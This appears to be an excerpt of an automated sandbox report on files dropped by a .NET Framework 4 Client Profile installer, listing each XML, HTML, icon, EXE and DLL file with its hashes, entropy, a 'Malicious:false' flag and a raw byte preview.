                                                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .x.m.l.n.s.:.i.r.o.n.m.a.n.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p./.2.0.0.8./.0.1./.i.m.". .S.e.t.u.p.V.e.r.s.i.o.n.=.".1...0.".>..... . .<.U.I. .D.l.l.=.".S.e.t.u.p.U.i...d.l.l.". .N.a.m.e.=.".M.i.c.r.o.s.o.f.t. ...N.E.T. .F.r.a.m.e.w.o.r.k. .4. .C.l.i.e.n.t. .P.r.o.f.i.l.e. .S.e.t.u.p.". .V.e.r.s.i.o.n.=.".4...0...3.0.3.1.9.". ./.>..... . .<.C.o.n.f.i.g.u.r.a.t.i.o.n.>..... . . . .<.D.i.s.a.b.l.e.d.C.o.m.m.a.n.d.L.i.n.e.S.w.i.t.c.h.e.s.>..... . . . . . .<.C.o.m.m.a.n.d.L.i.n.e.S.w.i.t.c.h. .N.a.m.e.=.".c.r.e.a.t.e.l.a.y.o.u.t.". ./.>..... . . . .<./.D.i.s.a.b.l.e.d.C.o.m.m.a.n.d.L.i.n.e.S.w.i.t.c.h.e.s.>..... . . . .<.U.s.e.r.E.x.p.e.r.i.e.n.c.e.D.a.t.a.C.o.l.l.e.c.t.i.o.n. .P.o.l.i.c.y.=.".O.S.C.o.n.t.r.o.l.l.e.d.". ./.>..... . . . .<.B.l.o.c.k.i.n.
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):39042
                                                                                                                                                                  Entropy (8bit):3.1132391675648923
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:24URyd5vssgP7ZgZ/vSguJQvFQXvDINJh6F8hZkV1GO0N0phUl9eu+dODOOODOtK:24URyd5vsTPuZXQYQLIN/6F8hZkV1GOv
                                                                                                                                                                  MD5:D7A2E90DD9DF6F93FD4B7354F8EC2B0D
                                                                                                                                                                  SHA1:A792C41B62796513E312F19DEE91447B9280B23B
                                                                                                                                                                  SHA-256:1D1590EB48E66646ED7917A76302862AC87E6651C841A808CF3FE797B9E697F6
                                                                                                                                                                  SHA-512:A3431DA5517428B69D4481A98AB6CDA6849F3B1B33DD44CC2EDFD76DDBF51BD2B45B3C4ED21293F7FEE2789281B8CF5120EF83F11F99DE6FC18C0E3FE5D1D9D5
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.S.e.t.u.p.U.I. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p.U.I./.2.0.0.8./.0.1./.i.m.u.i.". .x.m.l.n.s.:.i.m.u.i.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.S.e.t.u.p.U.I./.2.0.0.8./.0.1./.i.m.u.i.". .>..... . .<.U.I.>......... . . . .<.R.e.s.o.u.r.c.e.D.l.l.>.S.e.t.u.p.R.e.s.o.u.r.c.e.s...d.l.l.<./.R.e.s.o.u.r.c.e.D.l.l.>..... . . . .<.!.-.-..... . . . .<.S.p.l.a.s.h.S.c.r.e.e.n.>..... . . . . . .<.H.i.d.e./.>..... . . . .<./.S.p.l.a.s.h.S.c.r.e.e.n.>..... . . . .-.-.>..... . . . .<.S.p.l.a.s.h.S.c.r.e.e.n.>..... . . . . . .<.F.i.l.e.N.a.m.e.>.S.p.l.a.s.h.S.c.r.e.e.n...b.m.p.<./.F.i.l.e.N.a.m.e.>..... . . . .<./.S.p.l.a.s.h.S.c.r.e.e.n.>......... . . . .<.L.C.I.D.H.i.n.t.s.>..... . . . . . .<.L.C.I.D.H.i.n.t.>..... . . . . . . . .<.R.e.g.K.e.y.>.H.K.C.U.\.S.o.f.t.w.a.r.e.\.M.i.c.r.o.s.o.f.t.\.V.i.s.u.a.l.S.t.u.d.i.o.\.9...0.\.G.e.n.e.r.a.l.<./.
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):16118
                                                                                                                                                                  Entropy (8bit):3.6434775915277604
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:7Ddx3KOTczFQ21Kp4n5DTx1iDecPeLHLHQFJFjZWblWUxFzJzcKHjT:fdsOT01KcBUFJFEWUxFzvHH
                                                                                                                                                                  MD5:CD131D41791A543CC6F6ED1EA5BD257C
                                                                                                                                                                  SHA1:F42A2708A0B42A13530D26515274D1FCDBFE8490
                                                                                                                                                                  SHA-256:E139AF8858FE90127095AC1C4685BCD849437EF0DF7C416033554703F5D864BB
                                                                                                                                                                  SHA-512:A6EE9AF8F8C2C7ACD58DD3C42B8D70C55202B382FFC5A93772AF7BF7D7740C1162BB6D38A4307B1802294A18EB52032D410E128072AF7D4F9D54F415BE020C9A
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:..<.!.D.O.C.T.Y.P.E. .h.t.m.l. .P.U.B.L.I.C. .".-././.W.3.C././.D.T.D. .X.H.T.M.L. .1...1././.E.N.". .".h.t.t.p.:././.w.w.w...w.3...o.r.g./.T.R./.x.h.t.m.l.1.1./.D.T.D./.x.h.t.m.l.1.1...d.t.d.".>.....<.!.-.-. .T.h.e. .E.x.t.e.n.d.e.d. .C.o.p.y.r.i.g.h.t./.T.r.a.d.e.m.a.r.k. .L.a.n.g.u.a.g.e. .R.e.s.i.d.e.s. .A.t.:. .h.t.t.p.:././.w.w.w...m.i.c.r.o.s.o.f.t...c.o.m./.i.n.f.o./.c.p.y.r.t.I.n.f.r.g...h.t.m. .-.-.>.....<.h.t.m.l. .x.m.l.n.s.=.".h.t.t.p.:././.w.w.w...w.3...o.r.g./.1.9.9.9./.x.h.t.m.l.".>.....<.h.e.a.d.>.......<.m.e.t.a. .h.t.t.p.-.e.q.u.i.v.=.".C.o.n.t.e.n.t.-.T.y.p.e.". .c.o.n.t.e.n.t.=.".t.e.x.t./.h.t.m.l.;. .c.h.a.r.s.e.t.=.u.t.f.-.1.6."./.>.<.b.a.s.e. .t.a.r.g.e.t.=."._.b.l.a.n.k."./.>.......<.s.t.y.l.e. .t.y.p.e.=.".t.e.x.t./.c.s.s.".>.........h.t.m.l.{.o.v.e.r.f.l.o.w.:.s.c.r.o.l.l.}.........b.o.d.y.{.f.o.n.t.-.s.i.z.e.:.1.0.p.t.;.f.o.n.t.-.f.a.m.i.l.y.:.V.e.r.d.a.n.a.;.c.o.l.o.r.:.#.0.0.0.0.0.0.;.b.a.c.k.g.r.o.u.n.d.-.c.o.l.o.r.:.#.F.0.F.0.F.0.}...........h.e.a.d.e.r.
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:MS Windows icon resource - 13 icons, 16x16, 16 colors, 4 bits/pixel, 16x16, 8 bits/pixel
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):88533
                                                                                                                                                                  Entropy (8bit):7.210526848639953
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:1536:xWayqxMQP8ZOs0JOG58d8vo2zYOvvHAj/4/aXj/Nhhg73BVp5vEdb:e/gB4H8vo2no0/aX7C7Dct
                                                                                                                                                                  MD5:F9657D290048E169FFABBBB9C7412BE0
                                                                                                                                                                  SHA1:E45531D559C38825FBDE6F25A82A638184130754
                                                                                                                                                                  SHA-256:B74AD253B9B8F9FCADE725336509143828EE739CC2B24782BE3ECFF26F229160
                                                                                                                                                                  SHA-512:8B93E898148EB8A751BC5E4135EFB36E3AC65AF34EAAC4EA401F1236A2973F003F84B5CFD1BBEE5E43208491AA1B63C428B64E52F7591D79329B474361547268
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:..............(...............h...............h...f... .............. .............. ..........^...00......h....#..00..........n)..00...........8........ .h....T.. .... .....&Y..00.... ..%...i........ ._...v...(....... ....................................................................................................w......x......................x..ww...........h...............................w.....w.x..........x................xwvwg.................................................................(....... ...................................jO:.mS?.qWD.v\I.|cP..kX..q_..sa..yg..{j...p..nh..pj..uo..|u..xq..|r..|u..rx..zy..|w.}.y...q...d...y...{......S...]..d..i..r..|...j..j...y...e...k...l..q...y...~...v...y..s..s..m...m...l...n...k...t...l.............................................................................................................................................................................................
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1150
                                                                                                                                                                  Entropy (8bit):4.923507556620034
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:dOjNyw2aSGZHJi4U7Wf0mDX+QF7s/AemFAh:MjNyw/0NW9DOp/ANC
                                                                                                                                                                  MD5:7E55DDC6D611176E697D01C90A1212CF
                                                                                                                                                                  SHA1:E2620DA05B8E4E2360DA579A7BE32C1B225DEB1B
                                                                                                                                                                  SHA-256:FF542E32330B123486797B410621E19EAFB39DF3997E14701AFA4C22096520ED
                                                                                                                                                                  SHA-512:283D381AA396820B7E15768B20099D67688DA1F6315EC9F7938C2FCC3167777502CDED0D1BEDDF015A34CC4E5D045BCB665FFD28BA2FBB6FAF50FDD38B31D16E
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:............ .h.......(....... ..... .....@.........................................................................................t?.fR.|bN.y_K.v\H.rXD.oUA.kQ=.hN:.eK7.cI5.cI5.cI5i.........th<..z............................................cI5.cI5...................................................qXE.cI5.cI5.......~.............................................}eS.kR>.cI5......................................................q`.w^L.cI5..............................z..~n..sb..jX.{bP.t[H..~m..kY.nT@.......................................................{..wf.zaM.......vO.......................q..r`.}cQ.w]J..lZ.......t.x^J...........}Z..................................z`M........{aM...............0..............................jY.{aO...........................................................x^K.x^Kk.....................................................n\.y_L...........................r...............................y_L.x^K&.........................s.............

Process:C:\ProgramData\dotNetFx40_Client_setup.exe
File Type:MS Windows icon resource - 1 icon, 16x16, 24 bits/pixel
Category:dropped
Size (bytes):894
Entropy (8bit):2.5118974066097444
Encrypted:false
SSDEEP:6:kRKqNllGuv/ll2dL/rK//dlQt0tlWMlMN8Fq/wbD4tNZDlNc367YCm6p+Wvtjlpr:pIGOmDAQt8n+uNbctNZ5w6AsXjKHRp5c
MD5:26A00597735C5F504CF8B3E7E9A7A4C1
SHA1:D913CB26128D5CA1E1AC3DAB782DE363C9B89934
SHA-256:37026C4EA2182D7908B3CF0CEF8A6F72BDDCA5F1CFBC702F35B569AD689CF0AF
SHA-512:08CEFC5A2B625F261668F70CC9E1536DC4878D332792C751884526E49E7FEE1ECFA6FCCFDDF7BE80910393421CC088C0FD0B0C27C7A7EFF2AE03719E06022FDF
Malicious:false

Process:C:\ProgramData\dotNetFx40_Client_setup.exe
File Type:MS Windows icon resource - 1 icon, 16x16, 24 bits/pixel
Category:dropped
Size (bytes):894
Entropy (8bit):2.5178766234336925
Encrypted:false
SSDEEP:12:pmZX5+9wQaxWbwW3h/7eHzemn0iLHRp5c:Md5EaxWbh/Cnt4
MD5:8419CAA81F2377E09B7F2F6218E505AE
SHA1:2CF5AD8C8DA4F1A38AAB433673F4DDDC7AE380E9
SHA-256:DB89D8A45C369303C04988322B2774D2C7888DA5250B4DAB2846DEEF58A7DE22
SHA-512:74E504D2C3A8E82925110B7CFB45FDE8A4E6DF53A188E47CF22D664CBB805EBA749D2DB23456FC43A86E57C810BC3D9166E7C72468FBD736DA6A776F8CA015D1
Malicious:false

Process:C:\ProgramData\dotNetFx40_Client_setup.exe
File Type:MS Windows icon resource - 1 icon, 16x16, 24 bits/pixel
Category:dropped
Size (bytes):894
Entropy (8bit):2.5189797450574103
Encrypted:false
SSDEEP:12:pPrMIMxPWk3AyORrabBQ+gra2/MXWM4xfQHRp5c:1gxPbXlBQ+gr1ffO4
MD5:924FD539523541D42DAD43290E6C0DB5
SHA1:19A161531A2C9DBC443B0F41B97CBDE7375B8983
SHA-256:02A7FE932029C6FA24D1C7CC06D08A27E84F43A0CBC47B7C43CAC59424B3D1F6
SHA-512:86A4C5D981370EFA20183CC4A52C221467692E91539AC38C8DEF1CC200140F6F3D9412B6E62FAF08CA6668DF401D8B842C61B1F3C2A4C4570F3B2CEC79C9EE8B
Malicious:false

Process:C:\ProgramData\dotNetFx40_Client_setup.exe
File Type:MS Windows icon resource - 1 icon, 16x16, 24 bits/pixel
Category:dropped
Size (bytes):894
Entropy (8bit):2.5119705312617957
Encrypted:false
SSDEEP:6:kRK///FleTxml+SzNaoT9Q0/lHOmMdrYln8OUo/XRWl2XOXFBYpqnHp/p5c:p///FPwxUrMunUofRReFNHRp5c
MD5:BB55B5086A9DA3097FB216C065D15709
SHA1:1206C708BD08231961F17DA3D604A8956ADDCCFE
SHA-256:8D82FF7970C9A67DA8134686560FE3A6C986A160CED9D1CC1392F2BA75C698AB
SHA-512:DE9226064680DA6696976A4A320E08C41F73D127FBB81BF142048996DF6206DDB1C2FE347C483CC8E0E50A00DAB33DB9261D03F1CD7CA757F5CA7BB84865FCA9
Malicious:false

Process:C:\ProgramData\dotNetFx40_Client_setup.exe
File Type:MS Windows icon resource - 1 icon, 16x16, 24 bits/pixel
Category:dropped
Size (bytes):894
Entropy (8bit):2.5083713071878764
Encrypted:false
SSDEEP:6:kRKi+Blqkl/QThulVDYa5a//ItEl/aotzauakg//5aM1lkl05Kaag2/JqnHp/p5c:pXBHehqSayIylrtBg/bk4AgzHRp5c
MD5:3B4861F93B465D724C60670B64FCCFCF
SHA1:C672D63C62E00E24FBB40DA96A0CC45B7C5EF7F0
SHA-256:7237051D9AF5DB972A1FECF0B35CD8E9021471740782B0DBF60D3801DC9F5F75
SHA-512:2E798B0C9E80F639571525F39C2F50838D5244EEDA29B18A1FAE6C15D939D5C8CD29F6785D234B54BDA843A645D1A95C7339707991A81946B51F7E8D5ED40D2C
Malicious:false

Process:C:\ProgramData\dotNetFx40_Client_setup.exe
File Type:MS Windows icon resource - 1 icon, 16x16, 24 bits/pixel
Category:dropped
Size (bytes):894
Entropy (8bit):2.5043420982993396
Encrypted:false
SSDEEP:12:pjs+/hlRwx5REHevtOkslTaGWOpRFkpRHkCHRp5c:tZ/u+HeilBh/F+Rd4
MD5:70006BF18A39D258012875AEFB92A3D1
SHA1:B47788F3F8C5C305982EB1D0E91C675EE02C7BEB
SHA-256:19ABCEDF93D790E19FB3379CB3B46371D3CBFF48FE7E63F4FDCC2AC23A9943E4
SHA-512:97FDBDD6EFADBFB08161D8546299952470228A042BD2090CD49896BC31CCB7C73DAB8F9DE50CDAF6459F7F5C14206AF7B90016DEEB1220943D61C7324541FE2C
Malicious:false

Process:C:\ProgramData\dotNetFx40_Client_setup.exe
File Type:MS Windows icon resource - 1 icon, 16x16, 24 bits/pixel
Category:dropped
Size (bytes):894
Entropy (8bit):2.4948009720290445
Encrypted:false
SSDEEP:6:kRKIekllisUriJ2IP+eX8iDml8mS8+hlxllwqlllkg2klHYdpqnHp/p5c:p8os0iieX8iNVHX//x2sHYdoHRp5c
MD5:FB4DFEBE83F554FAF1A5CEC033A804D9
SHA1:6C9E509A5D1D1B8D495BBC8F57387E1E7E193333
SHA-256:4F46A9896DE23A92D2B5F963BCFB3237C3E85DA05B8F7660641B3D1D5AFAAE6F
SHA-512:3CAEB21177685B9054B64DEC997371C4193458FF8607BCE67E4FBE72C4AF0E6808D344DD0D59D3D0F5CE00E4C2B8A4FFCA0F7D9352B0014B9259D76D7F03D404
Malicious:false

Process:C:\ProgramData\dotNetFx40_Client_setup.exe
File Type:MS Windows icon resource - 1 icon, 16x16, 24 bits/pixel
Category:dropped
Size (bytes):894
Entropy (8bit):2.513882730304912
Encrypted:false
SSDEEP:12:pPv1OuTerb53mpOBfXjQuZfKWpIXE1D6HRp5c:91OEerb53eUQsflpIP4
MD5:D1C53003264DCE4EFFAF462C807E2D96
SHA1:92562AD5876A5D0CB35E2D6736B635CB5F5A91D9
SHA-256:5FB03593071A99C7B3803FE8424520B8B548B031D02F2A86E8F5412AC519723C
SHA-512:C34F8C05A50DC0DE644D1F9D97696CDB0A1961C7C7E412EB3DF2FD57BBD34199CF802962CA6A4B5445A317D9C7875E86E8E62F6C1DF8CC3415AFC0BD26E285BD
Malicious:false

Process:C:\ProgramData\dotNetFx40_Client_setup.exe
File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
Category:dropped
Size (bytes):1150
Entropy (8bit):4.824239610266714
Encrypted:false
SSDEEP:24:Br5ckw0Pce/WPv42lPpJ2/BatY9Y4ollEKeKzn:h6kPccWPQS2UtEYFEKeu
MD5:7D62E82D960A938C98DA02B1D5201BD5
SHA1:194E96B0440BF8631887E5E9D3CC485F8E90FBF5
SHA-256:AE041C8764F56FD89277B34982145D16FC59A4754D261C861B19371C3271C6E5
SHA-512:AB06B2605F0C1F6B71EF69563C0C977D06C6EA84D58EF7F2BAECBA566D6037D1458C2B58E6BFD70DDEF47DCCBDEA6D9C2F2E46DEA67EA9E92457F754D7042F67
Malicious:false

Process:C:\ProgramData\dotNetFx40_Client_setup.exe
File Type:MS Windows icon resource - 12 icons, 16x16, 16 colors, 4 bits/pixel, 16x16, 8 bits/pixel
Category:dropped
Size (bytes):36710
Entropy (8bit):5.3785085024370805
Encrypted:false
SSDEEP:384:IXcWz9GU46B4riEzg8CKcqxkk63gBh6wSphnBcI/ObMFp2rOebgcjTQcho:IMWQ2Bf8qqxMQP8pc4XessTJo
MD5:3D25D679E0FF0B8C94273DCD8B07049D
SHA1:A517FC5E96BC68A02A44093673EE7E076AD57308
SHA-256:288E9AD8F0201E45BC187839F15ACA79D6B9F76A7D3C9274C80F5D4A4C219C0F
SHA-512:3BDE668004CA7E28390862D0AE9903C756C16255BDBB3F7E73A5B093CE6A57A3165D6797B0A643B254493149231ACA7F7F03E0AF15A0CBE28AFF02F0071EC255
Malicious:false
                                                                                                                                                                  Preview:..............(...............h...............h...V... .............. .............. ..........N...00......h...."..00..........^)..00...........8........ .h....T.. .... ......Y..00.... ..%...i..(....... ....................................................................................................w......x......................x..ww...........h...............................w.....w.x..........x................xwvwg.................................................................(....... ...................................jO:.mS?.qWD.v\I.|cP..kX..q_..sa..yg..{j...p..nh..pj..uo..|u..xq..|r..|u..rx..zy..|w.}.y...q...d...y...{......S...]..d..i..r..|...j..j...y...e...k...l..q...y...~...v...y..s..s..m...m...l...n...k...t...l..........................................................................................................................................................................................................
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1150
                                                                                                                                                                  Entropy (8bit):5.038533294442847
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:MuoBP5lj49s9NRDe4LakKcTM8cv99uGzMN:MlFH3/Ri4LaN3q
                                                                                                                                                                  MD5:661CBD315E9B23BA1CA19EDAB978F478
                                                                                                                                                                  SHA1:605685C25D486C89F872296583E1DC2F20465A2B
                                                                                                                                                                  SHA-256:8BFC77C6D0F27F3D0625A884E0714698ACC0094A92ADCB6DE46990735AE8F14D
                                                                                                                                                                  SHA-512:802CC019F07FD3B78FCEFDC8404B3BEB5D17BFC31BDED90D42325A138762CC9F9EBFD1B170EC4BBCCCF9B99773BD6C8916F2C799C54B22FF6D5EDD9F388A67C6
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:............ .h.......(....... ..... .....@..........................................M...........S...........................................q.......................z...................................;........q.c.P.K.|.}............C....................................;.!......................................................Ry,.*w..!.............-.........................................6b..8v................ .+.@............#....................4u..;a..............H.<.........=.C.............................&y..x.e.................$}......................................<.).........\.A............}..................................[.R.}.n.Z.C.y.Y.k.L............. q..............................t.s............r...k.........]{G..............................................y.`.z.h.a.N.e.P...............................................~.q._.J...............................8....................t.p..................?..................................................
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1150
                                                                                                                                                                  Entropy (8bit):5.854644771288791
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:u2iVNINssNQhYMEyfCHWZZ7rTRrbWjcyuE:uDW871fdZ1lbWjME
                                                                                                                                                                  MD5:EE2C05CC9D14C29F586D40EB90C610A9
                                                                                                                                                                  SHA1:E571D82E81BD61B8FE4C9ECD08869A07918AC00B
                                                                                                                                                                  SHA-256:3C9C71950857DDB82BAAB83ED70C496DEE8F20F3BC3216583DC1DDDA68AEFC73
                                                                                                                                                                  SHA-512:0F38FE9C97F2518186D5147D2C4A786B352FCECA234410A94CC9D120974FC4BE873E39956E10374DA6E8E546AEA5689E7FA0BEED025687547C430E6CEFFABFFB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:............ .h.......(....... ..... .....@....................................../..F..........!....n....d..................................;.............,+..AB..UV..XZ...1.....S......................U.....................EE..\[..rr......NP.....^..............<s.....................!.$)..AC..jj..ww..{{..57.....4........01.................H..........N?8;..[[..ba..`_..TU....L.......bj]^..QP.........:..........)N#&..>=..GG..HI..IJ..EE..!#......24..mm..hh..,.............+N........)(..*-.....{-...-,........ SPS..zy..qr....qq......0NCE..33..%%........ZJ...."$..0/../1....?qRU............W}..)A]^..rr..qq..Y[...._z........CE..RQ..AC....8`79.........SU..ab......||..ef....ey...........QZ[..ZZ..=?.....(...d....................pr.....H............IK..jj..fg..*,..........]_..................[y.......(..:VQS..{z..ut..ab....'H...........?................||..ef..jk..................$%d....................W....................................*,n.............................HI......................WY
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:MS Windows icon resource - 6 icons, 32x32, 16 colors, 4 bits/pixel, 16x16, 16 colors, 4 bits/pixel
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):10134
                                                                                                                                                                  Entropy (8bit):6.016582854640062
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:96:uC1kqWje1S/f1AXa0w+2ZM4xD02EuZkULqcA0zjrpthQ2Ngms9+LmODclhpjdfLt:JkqAFqroMS9lD9Ngr9+m7bxpXHT5ToYR
                                                                                                                                                                  MD5:5DFA8D3ABCF4962D9EC41CFC7C0F75E3
                                                                                                                                                                  SHA1:4196B0878C6C66B6FA260AB765A0E79F7AEC0D24
                                                                                                                                                                  SHA-256:B499E1B21091B539D4906E45B6FDF490D5445256B72871AECE2F5B2562C11793
                                                                                                                                                                  SHA-512:69A13D4348384F134BA93C9A846C6760B342E3A7A2E9DF9C7062088105AC0B77B8A524F179EFB1724C0CE168E01BA8BB46F2D6FAE39CABE32CAB9A34FC293E4A
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:...... ..........f...........(...N... ..........v...........h....... .... ............... .h....#..(... ...@......................................................................................................wwx...........w....w.........x....x.........x.y.......................p..............x.........q.......p.........q.................xy...........q.......................p.............y..................x.y..............y.y.............yyy.........S........x..........yy.............x.yyyx......................Q.8.........x..............y....qy.p...y.....x.....p........y....9.....y....yy..yx.......y..yyyw..p.....y.yyyyy................x.p........y.yy..........x...x............x.................wwx.....................?...................................................................................................?............(....... ..................................................................................................ww.....w..........xx..x........x....p........xy
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:MS Windows icon resource - 6 icons, 32x32, 16 colors, 4 bits/pixel, 16x16, 16 colors, 4 bits/pixel
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):10134
                                                                                                                                                                  Entropy (8bit):4.3821301214809045
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:USAk9ODMuYKFfmiMyT4dvsZQl+g8DnPUmXtDV3EgTtc:r9wM7pyEBlcgssmXpVUgJc
                                                                                                                                                                  MD5:B2B1D79591FCA103959806A4BF27D036
                                                                                                                                                                  SHA1:481FD13A0B58299C41B3E705CB085C533038CAF5
                                                                                                                                                                  SHA-256:FE4D06C318701BF0842D4B87D1BAD284C553BAF7A40987A7451338099D840A11
                                                                                                                                                                  SHA-512:5FE232415A39E0055ABB5250B120CCDCD565AB102AA602A3083D4A4705AC6775D45E1EF0C2B787B3252232E9D4673FC3A77AAB19EC79A3FF8B13C4D7094530D2
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:...... ..........f...........(...N... ..........v...........h....... .... ............... .h....#..(... ...@................................................................................................................................................................wwwww.....wwww...................3333333333338...{....3s.....x...{....0G;.............0.;...7.........33....8.....{...33..............0....7...............8.......{....;.............0.;.............0...8...........4...............wu;.............ww;.............ww;?...........;ww;.............7w................................8.............{...................................................................................................................................................................?...?..................................................?...?.........(....... ........................................................................................................333333;...............8.........;........
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (412), with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):201796
                                                                                                                                                                  Entropy (8bit):3.4097027044493644
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:384:wYQH0RbAGiYNVrkT+8TodTBltw11VTvcL1wCiUj78leRqmH9Hej2iXWKMNGIe9bs:w2RbYoVQTLTQTDFdPknZ13GpPcbrIl
                                                                                                                                                                  MD5:EB9D318BBEA1F384A78EDE1D1051F47D
                                                                                                                                                                  SHA1:ECD4391FE00D9BB73964456AF15FCD94DB676CC0
                                                                                                                                                                  SHA-256:73B29A019C1821304C65A30F338DB2747B950EBCC0E65C02CFF39A0166316A72
                                                                                                                                                                  SHA-512:91716D9A78852DB0ABE526A08C73C8349EEB997AD493A8F5B043E45A4A7AADB15FEBFBBC42641AEEC445BC36B0054A4520E051A0CE4CADD237510033F3A9BCE0
                                                                                                                                                                  Malicious:false
                                                                                                                                                                   Preview (UTF-16LE decoded; the report's raw preview shows each character followed by its null byte, so the text below is the same bytes rendered readably, truncated where the report truncates it):
                                                                                                                                                                   <?xml version="1.0" encoding="utf-16"?>
                                                                                                                                                                   <Setup xmlns="http://schemas.microsoft.com/Setup/2008/01/im" xmlns:ironman="http://schemas.microsoft.com/Setup/2008/01/im" SetupVersion="1.0">
                                                                                                                                                                     <UI Dll="SetupUi.dll" Name="Microsoft .NET Framework 4 Client Profile Setup" Version="4.0.30319" />
                                                                                                                                                                     <Configuration>
                                                                                                                                                                       <DisabledCommandLineSwitches>
                                                                                                                                                                         <CommandLineSwitch Name="createlayout" />
                                                                                                                                                                       </DisabledCommandLineSwitches>
                                                                                                                                                                       <UserExperienceDataCollection Policy="OSControlled" />
                                                                                                                                                                       <Blockin
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):78152
                                                                                                                                                                  Entropy (8bit):6.011592088917562
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:1536:sYNItbBL5NWiiESc0exWZnqxMQP8ZOs0JD9rHUq:sYNAB9NWTZctc/gBJ9oq
                                                                                                                                                                  MD5:006F8A615020A4A17F5E63801485DF46
                                                                                                                                                                  SHA1:78C82A80EBF9C8BF0C996DD8BC26087679F77FEA
                                                                                                                                                                  SHA-256:D273460AA4D42F0B5764383E2AB852AB9AF6FECB3ED866F1783869F2F155D8BE
                                                                                                                                                                  SHA-512:C603ED6F3611EB7049A43A190ED223445A9F7BD5651100A825917198B50C70011E950FA968D3019439AFA0A416752517B1C181EE9445E02DA3904F4E4B73CE76
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......;.................j.}.....].v.....h.w.....\.H...v.e.|.......B.....h.~.....Y.|.....].~.....m.~.....l.~.....k.~...Rich............PE..L......K.........."......f...........+............@..........................P............@...... ..................pu..x...Tp..<.......................H....@...... ................................(..@............................................text....e.......f.................. ..`.data................j..............@....rsrc................v..............@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                  Process:C:\ProgramData\dotNetFx40_Client_setup.exe
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):807256
                                                                                                                                                                  Entropy (8bit):6.357664904941565
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24576:GS62nlYAqK/AitUgiuVQk/oifPNJIkjbSTzR8NmsBJj:GS62nlYAltBjPNJIkHST18QsBJ
                                                                                                                                                                  MD5:84C1DAF5F30FF99895ECAB3A55354BCF
